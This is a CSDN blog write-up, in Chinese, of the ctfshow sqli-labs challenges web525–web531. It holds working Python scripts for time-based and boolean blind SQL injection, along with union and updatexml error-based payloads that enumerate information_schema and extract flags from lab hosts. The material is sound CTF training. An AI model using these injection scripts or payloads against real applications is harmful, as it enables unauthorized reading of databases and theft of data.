ctfshow web入门 sqli-libs web525--web531

最新推荐文章于 2024-09-05 17:22:26 发布
最新推荐文章于 2024-09-05 17:22:26 发布
阅读量254 收藏 5
点赞数 1
分类专栏: ctfshow 文章标签: 经验分享 web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140048477
版权

web525

import requests

flag=""
i=0
while True:
    i += 1
    low = 32
    high =127

    while low < high:
        mid = (low+high)//2


        #url=f"http://376bec44-3484-4842-81f7-6248706c0ded.challenge.ctf.show/?id=1' and if((ascii(substr((database()),{i},1))>{mid}),sleep(0.4),0) --+"
        #security
        #url = f"http://376bec44-3484-4842-81f7-6248706c0ded.challenge.ctf.show/?id=1' and if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.4),0) --+"
        #ctfshow, ctftrainiqg / inhormatiqq_scnema, mysql, uerfortanch_scjema2security, tfst
        #url = f"https://9b07e3d2-53e3-440b-95e2-9e83c07520e3.challenge.ctf.show/?id=1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.4),0) --+"
        # fnagug8
        #url = f"https://9b07e3d2-53e3-440b-95e2-9e83c07520e3.challenge.ctf.show/?id=1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flagug'),{i},1))>{mid}),sleep(0.4),0) --+"
        #id,flag4a23
        url = f"https://9b07e3d2-53e3-440b-95e2-9e83c07520e3.challenge.ctf.show/?id=1' and if((ascii(substr((select group_concat(id,flag4a23) from ctfshow.flagug),{i},1))>{mid}),sleep(0.4),0) --+"

        r=requests.get(url=url)

        try:
          r=requests.get(url=url,timeout=0.3)
          high =mid
        except:
           low =mid +1
    if low!= 32:
        flag+=chr(low)
    else:
        break
    print(flag)

web526

服了这括号太多了,我眼睛都要看花了,才给写好(为了自己熟练一点非要自己重新写一遍,麻了)

import requests

flag=""
i=0

while True:
    i+=1
    low=32
    high=127

    while low<high:
        mid=(low+high)// 2
        #url = f'https://000df5c9-ac11-43d8-80e9-6300ccdb1d99.challenge.ctf.show/?id=1" and if((ascii(substr((database()),{i},1))>{mid}),sleep(0.4),0) --+'
        #url = f'https://000df5c9-ac11-43d8-80e9-6300ccdb1d99.challenge.ctf.show/?id=1" and if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.4),0) --+'
        #url = f'https://000df5c9-ac11-43d8-80e9-6300ccdb1d99.challenge.ctf.show/?id=1" and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid}),sleep(0.4),0) --+'
        #url = f'https://000df5c9-ac11-43d8-80e9-6300ccdb1d99.challenge.ctf.show/?id=1" and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagugs"),{i},1))>{mid}),sleep(0.4),0) --+'
        url = f'https://000df5c9-ac11-43d8-80e9-6300ccdb1d99.challenge.ctf.show/?id=1" and if((ascii(substr((select group_concat(id,flag43s) from ctfshow.flagugs),{i},1))>{mid}),sleep(0.4),0) --+'

        try:
            r=requests.get(url=url,timeout=0.3)
            high=mid
        except:
            low=mid+1

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

web527

在这里插入图片描述
修改了传参模式了,记得把submit给删了不然报错

passwd=1&uname=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")--+
flagugsd

passwd=1&uname=1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="flagugsd")--+
id,flag43s

思路,随便填的一个联合注入结果说我写错了
打开hackbar一看,然后一直改发现就是报错,于是把submit删了

web528

")闭合

passwd=123&uname=1") union select 1,2--+

passwd=123&uname=1") union select 1,group_concat(schema_name) from information_schema.schemata--+
ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test

passwd=123&uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"--+
flagugsds

passwd=123&uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_name="flagugsds"--+
id,flag43as

web529

报错注入,有些写的是布尔盲注我是不知道怎么测出来的
页面确实没有回显但是也没变化哇

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select schema_name from information_schema.schemata limit 0,1)),3)--+
XPATH syntax error: '=ctfshow'

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1)),3)--+
XPATH syntax error: '=flag'

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select column_name from information_schema.columns where table_name='flag' limit 1,2)),3)--+
XPATH syntax error: '=flag4'

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select flag4 from ctfshow.flag limit 0,1)),3)--+
XPATH syntax error: '=ctfshow{9ab47312-f5c5-41a5-ab73'
只有半边,报错注入的特产
右边应该还有我们截取函数

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select right(flag4,14) from ctfshow.flag limit 0,1)),3)--+
-6219f41c2091}

ctfshow{9ab47312-f5c5-41a5-ab73-6219f41c2091}'

web530

双引号闭合

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select 1,2,3 limit 0,1)),3)--+
Operand should contain 1 column(s)

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select 1 limit 0,1)),3)--+

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select schema_name from information_schema.schemata limit 0,1)),3)--+
XPATH syntax error: '=ctfshow'

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1)),3)--+
PATH syntax error: '=flagb'

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select column_name from information_schema.columns where table_name='flagb' limit 1,2)),3)--+
XPATH syntax error: '=flag4s'

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select flag4s from ctfshow.flagb)),3)--+
XPATH syntax error: '=ctfshow{6b4c18f2-1f33-49b4-bf13'

passwd=123&uname=1" or updatexml(1,concat(0x3d,(select right(flag4s,14) from ctfshow.flagb)),3)--+
XPATH syntax error: '=-dd7ac9040e1e}'

既然看到了盲注
然后你就会发现找不到,反正我是找了半天
必须这么闭合才会触发布尔盲注
在这里插入图片描述
在这里插入图片描述

import requests

url = "https://6f79b7f2-69de-437a-9057-548488bcfb0f.challenge.ctf.show/"
flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (low + high) // 2

        # payload = f'if(ascii(substr(select schema_name from information_schema.schemata,{i},1)) > {mid},1,,0)'
        # payload=f'if(ascii(substr((select table_name from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
        # flagb
        # payload=f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow" and table_name ="flagb"),{i},1))>{mid},1,0)'
        # id, flag4s
        payload = f'if(ascii(substr((select flag4s from ctfshow.flagb),{i},1))>{mid},1,0)'
        data = {
            'uname': f'admin"and {payload}#',
            'passwd': '1'
        }
        r = requests.post(url=url, data=data)

        if "flag" in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break

    print(flag)

web531

在这里插入图片描述
布尔盲注

import requests

url = "https://606c4dd2-1e36-4e59-a23b-e0acabdd763f.challenge.ctf.show/"
flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (low + high) // 2

        payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1)) > {mid},1,0)'
        #payload=f'if(ascii(substr((select table_name from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
        # flagba
        #payload=f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow" and table_name ="flagba"),{i},1))>{mid},1,0)'
        # id, flag4sa
        #payload = f'if(ascii(substr((select flag4sa from ctfshow.flagba),{i},1))>{mid},1,0)'
        data = {
            'uname': f"admin'and {payload}#",
            'passwd': '123'
        }
        r = requests.post(url=url, data=data)

        if "flag" in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

后面发现时间盲注也可以

import requests

url="https://3793f88e-86c7-47d0-865e-dd7cb82afa1f.challenge.ctf.show/"
flag=""
i=0
while True:
    i += 1
    low = 32
    high =127

    while low < high:
        mid = (low+high)//2

        #payload=f"if((ascii(substr((database()),{i},1))>{mid}),sleep(0.4),0)"
        #payload=f"if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.4),0)"
        #payload=f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.4),0)"
        #payload=f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flagba'),{i},1))>{mid}),sleep(0.4),0)"
        payload=f"if((ascii(substr((select group_concat(id,flag4sa) from ctfshow.flagba),{i},1))>{mid}),sleep(0.4),0)"
        data={
            'uname':f"admin'and {payload}#",
            'passwd':'1'
        }


        try:
          r=requests.post(url=url,data=data,timeout=0.3)
          high =mid
        except:
           low =mid +1
    if low!= 32:
        flag+=chr(low)
    else:
        break
    print(flag)
baozongwi
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ctfshow web入门 sqli-labs篇 web517-web568 详细题解 全
Jay17的博客
07-30 1152
Ctfshow web入门 sqli-labs篇 web517-web568 详细题解 详细 详细 详细 真的详细
ctfshow web入门 sqli-labs(持续更新)
Lum1n0us's Blog
04-14 2128
文章目录web517-1web518-2web519-3web520-4web521-5web522-6web523-7web524-8web525-9web526-10web527-11web528-12web529-13web530-14web531-15web532-16web533-17web534-18web535-19web536-20web537-21web538-22web539-23 web517-1 ctfshow的sqli-labs和本地搭建最大的不同,就是show的flag不在当前的
CTFshow_web入门_sqli-labs
weixin_43896504的博客
07-21 216
SQL注入labs
ctfshow-sqli-libs笔记(web517-web539)
Yasso的博客
09-08 617
> 好久没做基础的sql注入题了,平台上发现sqli-libs,网课无聊打一下 发布后自动把我的单引号改成了中文格式,不知道为啥 web517 {字符型注入-联合查询} id=1’ and 1=1–+ 正常回显 id=1’ and 1=2–+ 异常回显 id=0’ order by 3–+ 查询字段数为3 id=0’ union select 1,2,database()–+ 爆出当前数据库为security—真正flag在ctfshow数据库里… id=0’ union select 1
ctfshow web入门 web57
lonmar的博客
11-24 1136
文章目录0x010x020x03 看wp分析一波 只要凑出36即可 0x01 shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368 ${_}:代表上一次命令执行的结果 $(()): 做运算 0x02 之前没有命令返回或者执行,结果应该是空,与""等价 又 $((""))值为0,$((~$((""))))值为-1,再做拼接: 所以可以拼接得到-37 , -37
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
CTFshow-sqli-labs
Leo8283的博客
04-20 703
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
网络安全面试经验分享:蘑菇街/网络安全
persist213的博客
08-27 2150
网安面试指南》
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 239
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
【网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1515
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
浅谈网络安全的认识与学习规划
最新发布
qq_201729558
09-05 295
本文主要介绍网络安全认识与学习规划
全球性“微软蓝屏”事件的深思:网络安全与系统稳定性的挑战与应对
图灵追幕者博客录
09-05 569
近日,由于微软视窗系统软件更新引发的全球性“微软蓝屏”事件,成为科技领域的热点新闻。这次事件不仅影响了全球约850万台设备,波及航空、医疗、传媒等关键行业,还导致美国超过2.3万架次航班延误。如此规模的系统中断,再次将网络安全与系统稳定性的问题推上了风口浪尖。这次事件为我们敲响了警钟,提醒我们必须更加重视网络安全和系统稳定性。那么,如何构建一个更加稳固和安全的网络环境?在网络安全和系统稳定性方面,我们应采取哪些措施?
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 1055
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1537
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全中的重要性
wholeliubei的博客
09-05 173
人工智能(AI)是计算机科学的一个分支,基于某些独特的算法和相关数学计算,使机器能够拥有人类的决策能力。另一方面,网络安全包括保护虚拟世界免受网络攻击和威胁的安全措施。人工智能能够通过采取与精确算法和数学计算相关的安全措施来保护和清理网络空间。随着人工智能在现代世界中的作用增加,对网络安全的威胁已成为一个严重的问题。
【网络安全】服务基础第一阶段——第七节:Windows系统管理基础---- Web与FTP服务器
goldfish8848的博客
08-31 1277
将某台计算机中的⽂件通过⽹络传送到可能相距很远的另⼀台计算机中,是⼀项基本的⽹络应⽤,即⽂件传送。(File Transfer Protocol)是因特⽹上使⽤得最⼴泛的⽂件传送协议。涉及到文件的上传和下载,很多都会使用到文件传输协议。文件传输协议提供了不同主机之间的文件传输能力,允许用户进行文件的上传和下载。而对于两台主机间的通信,说到底还是两台主机的应用程序在进行通信。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1054
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
快速搭建Web攻防Sqli-lab环境:PhpStudy、Firefox插件与Sqlmap安装指南
在本节中,我们将深入探讨如何在Web攻防训练营中搭建Sqli-Lab环境,这是一项重要的实践技能,尤其对于学习和理解SQL注入攻击与防御至关重要。首先,我们使用的工具是phpStudy,一个集成开发环境(IDE)的选择,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值